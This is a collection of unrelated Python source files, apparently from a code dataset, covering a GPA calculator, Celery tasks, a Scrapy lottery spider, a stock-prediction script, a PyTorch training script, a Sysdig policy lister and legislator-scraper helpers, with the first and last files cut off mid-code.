hours = int(parts[2])
letter_grade = parts[3]
q_points = find_quality_points_for_course(letter_grade,hours)
semester_hours = semester_hours + hours
semester_q_points = semester_q_points + q_points
semester_gpa = semester_q_points / semester_hours
if semester_gpa >= 3.5: #This is the code that will activate if you have a big-ball gpa during the given semester.
total_hours = total_hours + semester_hours
total_q_points = total_q_points + semester_q_points
total_gpa = total_q_points / total_hours
print("%-15s%10d%10.2f%10.2f%20s" % (semester,semester_hours,semester_q_points,semester_gpa, "DEAN'S LIST"))
else: #This code will be actived if you decide to have a relaxing semester.
total_hours = total_hours + semester_hours
total_q_points = total_q_points + semester_q_points
total_gpa = total_q_points / total_hours
print("%-15s%10d%10.2f%10.2f" % (semester,semester_hours,semester_q_points,semester_gpa))
print("-" * 65)
if total_gpa >= 3.5: #This code will calculate your results IF your final gpa was big-baller status.
print("%-15s%10d%10.2f%10.2f%20s" % ("Cumulative",total_hours,total_q_points,total_gpa,"HONORS"))
else: #This code will calculate your results IF your final gpa reflects your study habits.
print("%-15s%10d%10.2f%10.2f" % ("Cumulative",total_hours,total_q_points,total_gpa))
input("\nPress enter to exit program")
fvar.close()
|
15,716 | c9ad5cbc6f9d75e9930c3e52448af2226a9f82ae | ## Create your tasks here
from __future__ import absolute_import, unicode_literals
from celery import shared_task
from settings import SHORT, EXCHANGE_MARKETS
from taskapp.celery import app as celery_app
## Periodic tasks
@celery_app.task(retry=False)
def compute_and_save_indicators_for_all_sources(resample_period):
from taskapp.helpers import get_exchanges
for exchange in get_exchanges():
compute_and_save_indicators.delay(source=exchange, resample_period=resample_period)
@celery_app.task(retry=False)
def compute_and_save_indicators(source, resample_period):
from taskapp.helpers import _compute_and_save_indicators
_compute_and_save_indicators(source=source, resample_period=resample_period)
@shared_task
def precache_info_bot():
from apps.info_bot.helpers import precache_currency_info_for_info_bot
precache_currency_info_for_info_bot()
## Debug Tasks
# @shared_task
# def calculate_one_pair(resample_period=SHORT, transaction_currency='BTC', counter_currency = 2):
# from taskapp.helpers import _calculate_one_par
# import time
# timestamp=time.time()
# logger = logging.getLogger(__name__)
# _calculate_one_par(timestamp=timestamp, resample_period=resample_period, \
# transaction_currency=transaction_currency, counter_currency = counter_currency)
|
15,717 | e33aeff683f917031af70c5d1090396545d216f2 | import Options
import Environment
import sys, os, shutil, glob
from os import unlink, symlink, popen
from os.path import join, dirname, abspath, normpath
srcdir = '.'
blddir = 'build'
VERSION = '0.5.0'
def set_options(opt):
opt.tool_options('compiler_cxx')
opt.tool_options('compiler_cc')
opt.tool_options('misc')
opt.add_option( '--clearsilver'
, action='store'
, type='string'
, default=False
, help='clearsilver install'
, dest='clearsilver'
)
def configure(conf):
conf.check_tool('compiler_cxx')
if not conf.env.CXX: conf.fatal('c++ compiler not found')
conf.check_tool('compiler_cc')
if not conf.env.CC: conf.fatal('c compiler not found')
conf.check_tool('node_addon')
o = Options.options
if o.clearsilver:
conf.env.append_value("CPPFLAGS", '-I%s/include' % o.clearsilver)
conf.env.append_value("CPPFLAGS", '-I%s/include/ClearSilver' % o.clearsilver)
conf.env.append_value("LINKFLAGS", '-L%s/lib' % o.clearsilver)
# print conf.env
# check ClearSilver libs
conf.check_cc( lib='neo_cs', mandatory=True )
conf.check_cc( lib='neo_utl', mandatory=True )
conf.check_cc( lib='neo_cgi', mandatory=True )
conf.check_cc( lib='pthread', mandatory=True )
def build(bld):
# print 'build'
t = bld.new_task_gen('cxx', 'shlib', 'node_addon')
t.target = 'ClearSilver'
t.source = './src/clearsilver.cc'
t.includes = ['.']
t.lib = ['neo_cs','neo_cgi','neo_utl','pthread']
def shutdown(ctx):
pass
|
15,718 | 12d22cfa3d9332b0a73dbc55eff4279a705127ac | from annar4Interface import *
from annarProtoRecv import *
from annarProtoSend import *
from MsgObject_pb2 import *
|
15,719 | c89940ab8f33c890a41e56f998fd50f4a4d4e3f9 | # -*- coding: utf-8 -*-
import scrapy
class Cd05shuangseqiuSpider(scrapy.Spider):
name = 'cd_05shuangseqiu'
allowed_domains = ['kaijiang.zhcw.com']
start_urls = [
'http://kaijiang.zhcw.com/lishishuju/jsp/ssqInfoList.jsp?czId=1&beginIssue=2003001&endIssue=2019160¤tPageNum=1']
def parse(self, response):
qihaos = response.xpath("//tbody/tr/td[3]/text()").extract() # 期号列表
lanqius = response.xpath("//tbody/tr/td[4]/span/text()").extract() # 篮球中奖号列表
# hongses = response.xpath("//tbody/tr/td[4]/text()").extract() # 红色中奖号列表
# 获取经过处理的红球列表
hongqius = [hongse.split(" ")[0:-1] for hongse in response.xpath("//tbody/tr/td[4]/text()").extract()]
# print(qihaos,hongqius,lanqius)
# 把期号,红球号,篮球号组成一个dict字典类型数据
for index in range(len(qihaos)):
ssq_dict = {
"qihao": qihaos[index],
# 取出的红球元素为每期中奖的红色球组成的列表
"redOne": hongqius[index][0].lstrip('0'),
"redTwo": hongqius[index][1].lstrip('0'),
"redThree": hongqius[index][2].lstrip('0'),
"redFour": hongqius[index][3].lstrip('0'),
"redFive": hongqius[index][4].lstrip('0'),
"redSix": hongqius[index][5].lstrip('0'),
"blueSeven": lanqius[index].lstrip('0'),
}
yield ssq_dict
# 获取下一页的url地址
next_url = response.xpath('//div[@class="container"]/div[4]/a[3]/@href').extract_first().rstrip()
# print(next_url) # ssqInfoList.jsp?czId=1&beginIssue=2003001&endIssue=2019160&currentPageNum=7
# 拼接访问的url地址
url = response.urljoin(next_url)
print(url) # http://kaijiang.zhcw.com/lishishuju/jsp/ssqInfoList.jsp?czId=1&beginIssue=2003001&endIssue=2019160¤tPageNum=2
if url != response.url:
# url地址不是最后一页就继续爬取
yield scrapy.Request(url, callback=self.parse)
|
15,720 | 6291812f3643e26b4b526cb570f731d1c72ae857 | from tkinter import *
from db_class import Profile
window = Tk()
window.geometry("500x500")
path = "Profiles.sql"
def signup():
profile = Profile(path)
firstname = entryname.get()
surename = entrysurename.get()
email = entryemail.get()
password = entrypass.get()
new_ID = profile.get_count_of_profiles() + 1
profile.registration(new_ID, firstname, surename, email, password)
# profile.create_table()
profile.get_all_profiles()
label1 = Label(window, text="Registrtion")
label1.place(x=175, y=10)
labelname = Label(window, text="Firstname: ")
labelname.place(x=20, y=40)
entryname = Entry(window)
entryname.place(x=300, y=40)
lblsurename = Label(window, text="Surename: ")
lblsurename.place(x=20, y=80)
entrysurename = Entry(window)
entrysurename.place(x=300, y=80)
labelemail = Label(window, text="Email: ")
labelemail.place(x=20, y=120)
entryemail = Entry(window)
entryemail.place(x=300, y=120)
lblpass = Label(window, text="Password: ")
lblpass.place(x=20, y=160)
entrypass = Entry(window)
entrypass.place(x=300, y=160)
btn = Button(window, text="Create", command=signup)
btn.place(x=175, y=200)
window.mainloop() |
15,721 | 7fdcbf73086b3e1cc24b3bffe66d725d7f7c6139 | def checkeven(val):
if val%2==0:
return True
else:
return False
def checkodd(val):
if val%2!=0:
return True
else:
return False
choice=int(input("Tell whether you want to check even or odd\n1.even\n2.odd\n"))
num=int(input("Enter number to check: "))
if choice==1:
result_even=checkeven(num)
print(result_even)
elif choice==2:
result_odd=checkodd(num)
print(result_odd) |
15,722 | 07d44c70d8ef6f424166a3320af73c99767987ac | for s in input().split("-"):
print(s[0], end='')
|
15,723 | 6f9f49cfed352478bece0a5f23065fac13abeadc | import tushare as ts
import pandas as pd
import numpy as np
from sklearn.preprocessing import MinMaxScaler
from sklearn.ensemble import AdaBoostRegressor
import matplotlib.pyplot as plt
import matplotlib
matplotlib.rc('font', family='SimSun') #用来正常显示中文标签
plt.rcParams['axes.unicode_minus']=False #用来正常显示负号
from sklearn.decomposition import PCA
pd.set_option('display.max_columns', None)
count_row = -1
count_col = -1
value_count_row = 400
test_num = 100
number_of_day_before = 1
point = 0.02
base_point = 1
stock_list = ['000001','000049', '000338', '000002', '000520', '000537', '000540', '000568', '000629', '000636', '000651', '000661']
def timing(stock_code, split_point):
x_train = []
temp_x_train = []
y_train = []
x_test = []
temp_x_test = []
y_test = []
df = ts.get_hist_data(stock_code)
if df is None:
count_row = -2
else:
count_row = -1
if count_row > -2:
(count_row, count_col) = df.shape
if count_row > value_count_row:
base_point = df.iloc[count_row - 1, 2]
df['return'] = np.nan
for i in range(number_of_day_before, count_row):
df.iloc[i, 13] = (df.iloc[i - number_of_day_before, 2] - df.iloc[i, 2]) / df.iloc[i, 2]
'''
data = df[test_num : count_row]
print (data)
'''
###################################################
for i in range(count_row - 1, test_num - 1, -1):
for j in range(0, count_col):
temp_x_train.append(df.iloc[i, j])
x_train.append(temp_x_train)
temp_x_train = []
y_train.append(df.iloc[i, count_col])
print (x_train)
MinMax = MinMaxScaler()
x_train = MinMax.fit_transform(x_train)
###################################################
for i in range(test_num - 1, number_of_day_before - 1, -1):
for j in range(0, count_col):
temp_x_test.append(df.iloc[i, j])
x_test.append(temp_x_test)
temp_x_test = []
y_test.append(df.iloc[i, count_col])
x_test = MinMax.transform(x_test)
###################################################
estimator = PCA(n_components=5)
x_train = estimator.fit_transform(x_train)
x_test = estimator.transform(x_test)
###################################################
#model = SVC(C = 1.0, kernel = 'rbf', class_weight = {-1: 4, 0: 1, 1: 4})
#model = SVR(kernel='rbf', C=1000)
#model = RandomForestRegressor(n_estimators=50)
model = AdaBoostRegressor()
model.fit(x_train, y_train)
y_predict = model.predict(x_test)
print ('*****************************')
print (stock_code)
print ('y_test')
print (y_test)
print ('y_predict')
print (y_predict)
time_length = len(y_test)
sum_test = np.zeros(time_length)
sum_predict = np.zeros(time_length)
sum_test[0] = base_point * (1 + y_test[0])
sum_predict[0] = base_point * (1 + y_predict[0])
for i in range(1, time_length):
sum_test[i] = sum_test[i - 1] * (1 + y_test[i])
sum_predict[i] = sum_predict[i - 1] * (1 + y_predict[i])
fig,ax = plt.subplots()
index = range(0, time_length)
plt.plot(index, sum_test, "x-", label = "test")
plt.plot(index, sum_predict, "+-", label = "predict")
# 画买入/卖出点和直线
pre_min = min(sum_predict)
pre_max = max(sum_predict)
minindex = np.where(sum_predict == pre_min)[0][0]
maxindex = np.where(sum_predict == pre_max)[0][0]
plt.axvline(x=minindex, c = 'r')
plt.axvline(x=maxindex, c='g')
#换买入点到卖出点的直线
if minindex < maxindex:
plt.plot([minindex, maxindex], [sum_test[minindex], sum_test[maxindex]], color='b', marker='o')
profit_prt = cal_percent(sum_test[minindex], sum_test[maxindex])
plt.title('股票:{3} 第{0}日买入,第{1}日卖出,回测收益率{2}'.format(minindex, maxindex, profit_prt, stock_code))
else:
plt.title('预测下跌,不推荐持仓')
#计算收益率
plt.legend(bbox_to_anchor=(0.23, 0.97), loc=1, borderaxespad=0.)
plt.show()
def cal_percent(buy_price, sell_price):
percent = np.round(sell_price/buy_price - 1, 2)
return '{0:.0f}%'.format(percent*100)
def timing_package(stock_list):
for i_stock in stock_list:
#code = '%06d' % i_stock
#print (code)
timing(i_stock, 0)
#timing_package(stock_list)
|
15,724 | cdc14840f9f38fe28bee9bea0b5f5907cec0edac | __all__ = ['RF']
import plotly.graph_objects as go
import math
import sys
class Resource_fig():
def __init__(self, LUT_type, scq_size, target_timestamp):
if (LUT_type not in ('3', '4', '6')):
print("Error in selecting LUT type.")
return
self.LUT_type = LUT_type
self.tot_scq = scq_size
self.tts = target_timestamp
self.fig1 = go.Figure()
self.fig2 = go.Figure()
def config(self, LUT_type, scq_size, target_timestamp):
self.LUT_type = LUT_type
self.tot_scq = scq_size
self.tts = target_timestamp
def gen_comparator(self, width,k):
if(k==3):
return 4*width+1
if(k==4):
return 2*width+1
elif(k==6):
return width+1
return -1
def gen_adder(self, width,k):
if(k==6):
return width
elif(k==4):
return width*2
elif(k==3):
return width*2
else:
return -1
def gen_LUT_fig(self):
self.fig1 = go.Figure()
st = max(self.tts-40, 0)
ed = self.tts+30
x = list(range(st, ed, 1))
y_3,y_4,y_6=[],[],[]
z_3,z_4,z_6=[],[],[]
tot_comp = 33
tot_add = 32
for data in x:
y_3.append(self.gen_comparator(data,3)*tot_comp)
y_4.append(self.gen_comparator(data,4)*tot_comp)
y_6.append(self.gen_comparator(data,6)*tot_comp)
z_3.append(self.gen_adder(data,3)*tot_add)
z_4.append(self.gen_adder(data,4)*tot_add)
z_6.append(self.gen_adder(data,6)*tot_add)
y_1, y_2, name_1, name_2 = [],[],"",""
if (self.LUT_type=='3'):
y_1, y_2 = y_3, z_3
name_1 = "Number of LUT-3 for all Comparators"
name_2 = "Number of LUT-3 for all Adder/Subtractors"
elif (self.LUT_type=='4'):
y_1, y_2 = y_4, z_4
name_1 = "Number of LUT-4 for all Comparators"
name_2 = "Number of LUT-4 for all Adder/Subtractors"
else:
y_1, y_2 = y_6, z_6
name_1 = "Number of LUT-6 for all Comparators"
name_2 = "Number of LUT-6 for all Adder/Subtractors"
self.fig1.update_layout(title='Number of LUTs',
xaxis_title='Timestamp Width (bits)',
yaxis_title='Future-Time Number of LUTs')
# dash options include 'dash', 'dot', and 'dashdot'
self.fig1.add_trace(go.Scatter(x=x, y=y_1, name=name_1,
line=dict(color='firebrick', width=4)))
self.fig1.add_trace(go.Scatter(x=x, y=y_2, name = name_2,
line=dict(color='royalblue', width=4)))
self.fig1.add_trace(go.Scatter(x=[self.tts, self.tts],y=[y_1[self.tts-st], y_2[self.tts-st]],
name = "Current Configuration", line = dict(width=0),
line_shape = 'vhv'))
def gen_BRAM_fig(self):
self.fig2 = go.Figure()
dep_tab = {1:16384,2:8192,4:4096,9:2048,18:1024,36:256}
def gen_bram(nt,width):
if(width<=36):
cand = sys.maxsize # 88
for key, value in dep_tab.items():
if(key>=width):
cand = min(cand,key)
break
return math.ceil(nt/dep_tab[cand])
else:
cand = sys.maxsize #88
for key, value in dep_tab.items():
if(key>=width%36):
cand = min(cand,key)
break
return math.ceil(nt/dep_tab[36])*(width//36)+math.ceil(nt/dep_tab[cand])
st = max(self.tts-40, 0)
ed = self.tts+30
x = list(range(st, ed, 1))
y = []
for width in x:
extra = 5+1
if(width>36):
extra = 6+1
# y.append(gen_bram(self.tot_scq ,width)+extra)
y.append(gen_bram(self.tot_scq, width)+extra)
self.fig2.update_layout(title='Number of 18Kb BRAMs',
xaxis_title='Timestamp Width (bits)',
yaxis_title='Number of 18Kb BRAMs')
self.fig2.add_trace(go.Scatter(x=x, y=y,
line=dict(color='orange', width=4)))
self.fig2.add_trace(go.Scatter(x=[self.tts,], y=[y[self.tts-st],], name = "Current Configuration",
line=dict(color='purple', width=0), line_shape = 'vhv'))
def get_LUT_fig(self):
self.gen_LUT_fig()
return self.fig1
def get_BRAM_fig(self):
self.gen_BRAM_fig()
return self.fig2
RF = Resource_fig('3', 100, 32) |
15,725 | a60602c3d28117c66530e72914ffcf3c50e2d82b | import cronjob
@cronjobapp.register
def periodic_task():
print('ishwar...')
def my_cron_job():
print('hello ishwar')
f = open('/home/ishwar/Desktop/cronjobpro/cronjobapp/file.txt', 'w+')
f.write('ishwar')
f.close()
|
15,726 | 1f652275445d8625a1825d890ab953b9f7148822 | from django.db import models
# Create your models here.
class Disease(models.Model):
code = models.CharField(max_length=255)
name = models.CharField(max_length=255)
depart = models.CharField(max_length=255) #choices = []
class Symptom(models.Model):
code = models.CharField(max_length=255)
name = models.CharField(max_length=255)
class Symp_Ill(models.Model):
'''
M to M relationship table
'''
Ill = models.ForeignKey(Disease, on_delete=models.DO_NOTHING, related_name='symps')
Symp = models.ForeignKey(Symptom, on_delete=models.DO_NOTHING, related_name='ills')
|
15,727 | e08d9e5df77cf664cacc31760351013c02c03e0f | n = int(input())
numbers =[]
# numbers = [int(input() for _ in range(n))] # 아래와 같지만 컴프리헨션으로 구현
for _ in range(n):
numbers.append(int(input()))
sor = sorted(numbers, reverse=True)
for i in range(n):
print(sor[i], end=' ') |
15,728 | 73e1ec500b23e9dcc061ec5516e6c8f7a9fa8e98 | from django.urls import path
from .views import OrderAPIView, MyOrderAPIView
urlpatterns = [
path('order/', OrderAPIView.as_view(), name='orders'),
path('my-orders/', MyOrderAPIView.as_view(), name='my-orders'),
]
|
15,729 | 58a641a34914c4c5d141928389bd18a801e4102c | import shutil
import numpy as np
import torch
import torch.nn as nn
import torch.functional as tf
import torch.utils.data
import time
from tqdm import tqdm
import model_denoise_clouds as model
import argparse
try:
import nvidia_smi
NVIDIA_SMI = True
except:
NVIDIA_SMI = False
import sys
import os
import pathlib
import zarr
class Dataset(torch.utils.data.Dataset):
"""
Dataset class that will provide data during training. Modify it accordingly
for your dataset. This one shows how to do augmenting during training for a
very simple training set
"""
def __init__(self, n_training):
"""
Args:
n_training (int): number of training examples including augmenting
"""
super(Dataset, self).__init__()
self.n_training = n_training
f_matrix = zarr.open('training_matrices.zarr', 'r')
self.matrix = f_matrix['matrix'][:]
self.eigenvals = f_matrix['largest_eval'][:]
n_samples_matrix, _, _ = self.matrix.shape
f_surface = zarr.open('training_surfaces_libnoise.zarr', 'r')
self.surface = 1.0 - f_surface['surface'][:]
n_samples_surface, _ = self.surface.shape
f_clouds = zarr.open('training_clouds.zarr', 'r')
self.clouds = f_clouds['clouds'][:]
n_samples_clouds, _ = self.clouds.shape
self.index_matrix = np.random.randint(low=0, high=n_samples_matrix, size=self.n_training)
self.index_surface = np.random.randint(low=0, high=n_samples_surface, size=self.n_training)
self.index_clouds = np.random.randint(low=0, high=n_samples_clouds, size=(5, self.n_training))
def __getitem__(self, index):
Phi = self.matrix[self.index_matrix[index], :, :].astype('float32')
rho = 0.4 / self.eigenvals[self.index_matrix[index]]
Phi_split = Phi.reshape((5, 24, 3072))
surface = np.random.uniform(low=0.2, high=1.0) * self.surface[self.index_surface[index], :]
clouds = np.random.uniform(low=0.2, high=1.0, size=5)[:, None] * self.clouds[self.index_clouds[:, index], :]
d_split = np.zeros((5, 24))
for i in range(5):
d_split[i, :] = Phi_split[i, :, :] @ (clouds[i, :] + (1.0 - clouds[i, :])**2 * surface)
return Phi_split, surface.astype('float32'), clouds.astype('float32'), rho.astype('float32'), d_split.astype('float32')
def __len__(self):
return self.n_training
def save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, filename+'.best')
class Training(object):
def __init__(self, batch_size, validation_split=0.2, gpu=0, smooth=0.05, K=3, model_class='conv1d'):
self.cuda = torch.cuda.is_available()
self.gpu = gpu
self.smooth = smooth
self.device = torch.device(f"cuda:{self.gpu}" if self.cuda else "cpu")
# self.device = 'cpu'
self.batch_size = batch_size
self.model_class = model_class
self.K = K
if (NVIDIA_SMI):
nvidia_smi.nvmlInit()
self.handle = nvidia_smi.nvmlDeviceGetHandleByIndex(self.gpu)
print("Computing in {0} : {1}".format(self.device, nvidia_smi.nvmlDeviceGetName(self.handle)))
self.validation_split = validation_split
kwargs = {'num_workers': 4, 'pin_memory': False} if self.cuda else {}
if (model_class == 'conv1d'):
self.model = model.Network(K=self.K, L=32, device=self.device, model_class=model_class).to(self.device)
if (model_class == 'conv2d'):
self.model = model.Network(K=self.K, L=32, NSIDE=16, device=self.device, model_class=model_class).to(self.device)
print('N. total parameters : {0}'.format(sum(p.numel() for p in self.model.parameters() if p.requires_grad)))
self.train_dataset = Dataset(n_training=20000)
self.validation_dataset = Dataset(n_training=2000)
# Data loaders that will inject data during training
self.train_loader = torch.utils.data.DataLoader(self.train_dataset, batch_size=self.batch_size, shuffle=True, drop_last=True, **kwargs)
self.validation_loader = torch.utils.data.DataLoader(self.validation_dataset, batch_size=self.batch_size, shuffle=True, drop_last=True, **kwargs)
def init_optimize(self, epochs, lr, weight_decay, scheduler):
self.lr = lr
self.weight_decay = weight_decay
print('Learning rate : {0}'.format(lr))
self.n_epochs = epochs
if (self.model_class == 'conv1d'):
root = 'trained_denoise_clouds_1d'
if (self.model_class == 'conv2d'):
root = 'trained_denoise_clouds_2d'
p = pathlib.Path(f'{root}/')
p.mkdir(parents=True, exist_ok=True)
current_time = time.strftime("%Y-%m-%d-%H:%M:%S")
self.out_name = f'{root}/{current_time}'
# Copy model
file = model.__file__.split('/')[-1]
shutil.copyfile(model.__file__, '{0}_model.py'.format(self.out_name))
shutil.copyfile('{0}/{1}'.format(os.path.dirname(os.path.abspath(__file__)), file), '{0}_trainer.py'.format(self.out_name))
self.file_mode = 'w'
f = open('{0}_call.dat'.format(self.out_name), 'w')
f.write('python ' + ' '.join(sys.argv))
f.close()
f = open('{0}_hyper.dat'.format(self.out_name), 'w')
f.write('Learning_rate Weight_decay \n')
f.write('{0} {1}'.format(self.lr, self.weight_decay))
f.close()
self.optimizer = torch.optim.Adam(self.model.parameters(), lr=self.lr, weight_decay=self.weight_decay)
self.loss_fn = nn.MSELoss().to(self.device)
self.scheduler = torch.optim.lr_scheduler.StepLR(self.optimizer, step_size=scheduler, gamma=0.5)
np.random.seed(123)
self.surf0 = torch.tensor(np.random.rand(self.batch_size, 3072).astype('float32')).to(self.device)
self.surf0 = torch.zeros((self.batch_size, 3072)).to(self.device)
self.clouds0 = torch.tensor(np.random.rand(self.batch_size, 5, 3072).astype('float32')).to(self.device)
self.clouds0 = torch.zeros((self.batch_size, 5, 3072)).to(self.device)
torch.backends.cudnn.benchmark = True
def optimize(self):
self.loss = []
self.loss_val = []
best_loss = 1e10
trainF = open('{0}.loss.csv'.format(self.out_name), self.file_mode)
print('Model : {0}'.format(self.out_name))
for epoch in range(1, self.n_epochs + 1):
self.train(epoch)
self.test(epoch)
self.scheduler.step()
trainF.write('{},{},{}\n'.format(
epoch, self.loss[-1], self.loss_val[-1]))
trainF.flush()
is_best = self.loss_val[-1] < best_loss
best_loss = min(self.loss_val[-1], best_loss)
save_checkpoint({
'epoch': epoch + 1,
'state_dict': self.model.state_dict(),
'best_loss': best_loss,
'optimizer': self.optimizer.state_dict(),
}, is_best, filename='{0}.pth'.format(self.out_name))
trainF.close()
def train(self, epoch):
self.model.train()
print("Epoch {0}/{1}".format(epoch, self.n_epochs))
t = tqdm(self.train_loader)
loss_avg = 0.0
n = 1
for param_group in self.optimizer.param_groups:
current_lr = param_group['lr']
for batch_idx, (Phi_split, surface, clouds, rho, d_split) in enumerate(t):
Phi_split, surface, clouds, rho, d_split = Phi_split.to(self.device), surface.to(self.device), clouds.to(self.device), rho.to(self.device), d_split.to(self.device)
self.optimizer.zero_grad()
surf, clouds, out_surface, out_clouds = self.model(d_split, self.surf0, self.clouds0, Phi_split, rho, n_epochs=5)
# Loss
loss = 0.0
for i in range(self.K):
loss += self.loss_fn(out_surface[i], surface)
# loss += self.loss_fn(out_clouds[i], clouds)
loss.backward()
self.optimizer.step()
if (batch_idx == 0):
loss_avg = loss.item()
else:
loss_avg = self.smooth * loss.item() + (1.0 - self.smooth) * loss_avg
if (NVIDIA_SMI):
tmp = nvidia_smi.nvmlDeviceGetUtilizationRates(self.handle)
t.set_postfix(loss=loss_avg, lr=current_lr, gpu=tmp.gpu, mem=tmp.memory)
else:
t.set_postfix(loss=loss_avg, lr=current_lr)
self.loss.append(loss_avg)
def test(self, epoch):
self.model.eval()
t = tqdm(self.validation_loader)
n = 1
loss_avg = 0.0
with torch.no_grad():
for batch_idx, (Phi_split, surface, clouds, rho, d_split) in enumerate(t):
Phi_split, surface, clouds, rho, d_split = Phi_split.to(self.device), surface.to(self.device), clouds.to(self.device), rho.to(self.device), d_split.to(self.device)
surf, clouds, out_surface, out_clouds = self.model(d_split, self.surf0, self.clouds0, Phi_split, rho, n_epochs=5)
# Loss
loss = 0.0
for i in range(self.K):
loss += self.loss_fn(out_surface[i], surface)
# loss += self.loss_fn(out_clouds[i], clouds)
if (batch_idx == 0):
loss_avg = loss.item()
else:
loss_avg = self.smooth * loss.item() + (1.0 - self.smooth) * loss_avg
t.set_postfix(loss=loss_avg)
self.loss_val.append(loss_avg)
if (__name__ == '__main__'):
parser = argparse.ArgumentParser(description='Train neural network')
parser.add_argument('--lr', '--learning-rate', default=3e-4, type=float,
metavar='LR', help='Learning rate')
parser.add_argument('--wd', '--weigth-decay', default=0.0, type=float,
metavar='WD', help='Weigth decay')
parser.add_argument('--gpu', '--gpu', default=0, type=int,
metavar='GPU', help='GPU')
parser.add_argument('--smooth', '--smoothing-factor', default=0.05, type=float,
metavar='SM', help='Smoothing factor for loss')
parser.add_argument('--epochs', '--epochs', default=100, type=int,
metavar='EPOCHS', help='Number of epochs')
parser.add_argument('--scheduler', '--scheduler', default=100, type=int,
metavar='SCHEDULER', help='Number of epochs before applying scheduler')
parser.add_argument('--batch', '--batch', default=32, type=int,
metavar='BATCH', help='Batch size')
parser.add_argument('--model', '--model', default='conv1d', type=str,
metavar='MODEL', help='Model class')
parser.add_argument('--k', '--k', default=15, type=int,
metavar='K', help='K')
parsed = vars(parser.parse_args())
deepnet = Training(batch_size=parsed['batch'], gpu=parsed['gpu'], smooth=parsed['smooth'], K=parsed['k'], model_class=parsed['model'])
deepnet.init_optimize(parsed['epochs'], lr=parsed['lr'], weight_decay=parsed['wd'], scheduler=parsed['scheduler'])
deepnet.optimize() |
15,730 | b84c49fc698973cd6761dd4a60ece90ad17a5246 | #!/usr/bin/env python
#
# List the current set of secure policies.
#
import getopt
import json
import sys
from sdcclient import SdSecureClientV1
def usage():
print(('usage: %s [-o|--order-only] <sysdig-token>' % sys.argv[0]))
print('-o|--order-only: Only display the list of policy ids in evaluation order. '
'Suitable for use by set_policy_order.py')
print('You can find your token at https://secure.sysdig.com/#/settings/user')
sys.exit(1)
try:
opts, args = getopt.getopt(sys.argv[1:], "o", ["order-only"])
except getopt.GetoptError:
usage()
order_only = False
for opt, arg in opts:
if opt in ("-o", "--order-only"):
order_only = True
#
# Parse arguments
#
if len(args) < 1:
usage()
sdc_token = args[0]
#
# Instantiate the SDC client
#
sdclient = SdSecureClientV1(sdc_token, 'https://secure.sysdig.com')
ok, res = sdclient.get_policy_priorities()
if not ok:
print(res)
sys.exit(1)
# Strip the surrounding json to only keep the list of policy ids
res = res['priorities']['policyIds']
if not order_only:
priorities = res
ok, res = sdclient.list_policies()
if ok:
res['policies'].sort(key=lambda p: priorities.index(p['id']))
#
# Return the result
#
if ok:
print((json.dumps(res, indent=2)))
else:
print(res)
sys.exit(1)
|
15,731 | e0e7a22dfd3426a7140e2a3bd80dfbf28cbd2168 | import numpy as np
import os
import re
import matplotlib.pyplot as plt
import math
holes = []
solution = []
numholes = 0
def calculatePrice():
global holes, solution
price = 0
maxCost = 0
for i in range(numholes):
edgeCost = np.linalg.norm(np.array(holes[solution[i]]) - np.array(holes[solution[(i + 1) % numholes]]))
price = price + edgeCost
if edgeCost > maxCost:
maxCost = edgeCost
return price-maxCost
def readSolution():
global holes, solution, numholes
fileIn = f'C:\\Users\\mn170387d\\Desktop\\in263.txt'
fileSol = f'C:\\Users\\mn170387d\\Desktop\\solutionNN.txt'
print("Solution file:",fileSol);
with open(f'{fileIn}', 'r') as readerIn, open(f'{fileSol}') as readerSol:
hole = readerIn.readline()
sol = readerSol.readline()
while hole != '' and sol != '':
numholes = numholes + 1
coords = re.findall("\-?\d+\.\d+|\-?\d+", hole)
holes.append((float(coords[0]), float(coords[1])))
sol = re.findall("\-?\d+\.\d+|\-?\d+", sol)
solution.append((int(sol[0])));
hole = readerIn.readline()
sol = readerSol.readline()
def main():
readSolution();
price = calculatePrice()
print("Minimum cost without longest edge:",price)
if __name__ == '__main__':
main()
|
15,732 | bf85aa7b0e007a0208595ad3c14df05736d2dd9e | from sqlobject import *
hub = sqlhub
class Piece(SQLObject):
title = StringCol(notNull=True)
link = StringCol(alternateID=True)
description = StringCol()
price = CurrencyCol()
inventory = IntCol(notNull=True, default=0)
active = BoolCol(notNull=True, default=True)
class PieceTags(SQLObject):
piece = ForeignKey('Piece', cascade=True)
tag = StringCol(notNull=True)
class Section(SQLObject):
title = StringCol(notNull=True)
link = StringCol(alternateID=True)
description = StringCol()
tag = StringCol()
def init_db(reset=False):
for table in Piece, PieceTags, Section:
table.createTable(ifNotExists=True)
if reset:
table.clearTable()
|
15,733 | e17857fccc3e9654552097bf4a0930168a079edf |
a=25
b=15
print a+b
print a-b
print a*b
print a/b
print a%b
|
15,734 | ac5fc95016930186b1b1d630dd78216c9f6d4c25 | is_male =False
is_tall=True
if is_male and is_tall:
print("You are a tall male")
elif is_male and not(is_tall):
print("You are a short male")
elif not(is_male) and not is_tall:
print("You are a short male")
else:
print("You are either not male or nor tall or both")
|
15,735 | eac21d206975994fb0b9bf083e7ffa94085bfc05 | import datetime
import re
import attr
from spatula.core import Workflow
from spatula.pages import HtmlPage, HtmlListPage
from spatula.selectors import XPath
from common import Person
PARTY_MAP = {"R": "Republican", "D": "Democratic", "I": "Independent"}
party_district_pattern = re.compile(r"\((R|D|I)\) - (?:House|Senate) District\s+(\d+)")
name_elect_pattern = re.compile(r"(- Elect)$")
def get_party_district(text):
return party_district_pattern.match(text).groups()
lis_id_patterns = {
"upper": re.compile(r"(S[0-9]+$)"),
"lower": re.compile(r"(H[0-9]+$)"),
}
def get_lis_id(chamber, url):
"""Retrieve LIS ID of legislator from URL."""
match = re.search(lis_id_patterns[chamber], url)
if match.groups:
return match.group(1)
def clean_name(name):
name = name_elect_pattern.sub("", name).strip()
action, date = (None, None)
match = re.search(r"-(Resigned|Member) (\d{1,2}/\d{1,2})?", name)
if match:
action, date = match.groups()
name = name.rsplit("-")[0]
return name, action, date
def maybe_date(text):
try:
date = datetime.datetime.strptime(text, "%Y-%d-%m")
return date.strftime("%Y-%m-%d")
except ValueError:
return ""
# TODO: restore when we do committees again
# def get_committees(self, item):
# for com in item.xpath('//ul[@class="linkSect"][1]/li/a/text()'):
# key = (com, self.chamber)
# if key not in self.kwargs["committees"]:
# org = Organization(
# name=com, chamber=self.chamber, classification="committee"
# )
# org.add_source(self.url)
# self.kwargs["committees"][key] = org
# self.obj.add_membership(
# self.kwargs["committees"][key],
# start_date=maybe_date(self.kwargs["session"].get("start_date")),
